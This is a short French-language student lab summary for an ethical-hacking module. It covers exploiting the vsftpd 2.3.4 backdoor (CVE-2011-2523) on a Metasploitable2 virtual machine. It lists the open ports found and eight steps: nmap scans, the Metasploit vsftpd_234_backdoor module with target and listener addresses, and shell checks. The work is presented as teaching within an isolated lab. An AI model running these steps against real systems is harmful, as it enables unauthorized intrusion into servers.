
Évaluation de Hacking Éthique | Test pratique de vulnérabilité de la backdoor vsftpd 2.3.4 (CVE-2011-2523) sur Metasploitable2 en utilisant Kali Linux & Metasploit
Module : - Piratage éthique Université : London Metropolitan University Programme : BSc (Hons) Cyber Security and Forensic Science
Toutes les activités ont été menées dans un laboratoire virtuel isolé et contrôlé à des fins éducatives uniquement. Aucun système réel n'a été ciblé. Tous les travaux sont conformes au Computer Misuse Act 1990.
Port 21/tcp - vsftpd 2.3.4 (CIBLE) Port 22/tcp - OpenSSH 4.7p1 Port 23/tcp - Linux telnetd Port 80/tcp - Apache httpd 2.2.8 Port 139/tcp - Samba smbd 3.X Port 445/tcp - Samba smbd 3.X Port 3306/tcp - MySQL 5.0.51a Port 6667/tcp - UnrealIRCd
Étape 1 : nmap -sn 192.168.56.0/24 Étape 2 : nmap -sV 192.168.56.103 Étape 3 : msfconsole Étape 4 : use exploit/unix/ftp/vsftpd_234_backdoor Étape 5 : set RHOSTS 192.168.56.103 Étape 6 : set LHOST 192.168.56.1 Étape 7 : run Étape 8 : id && whoami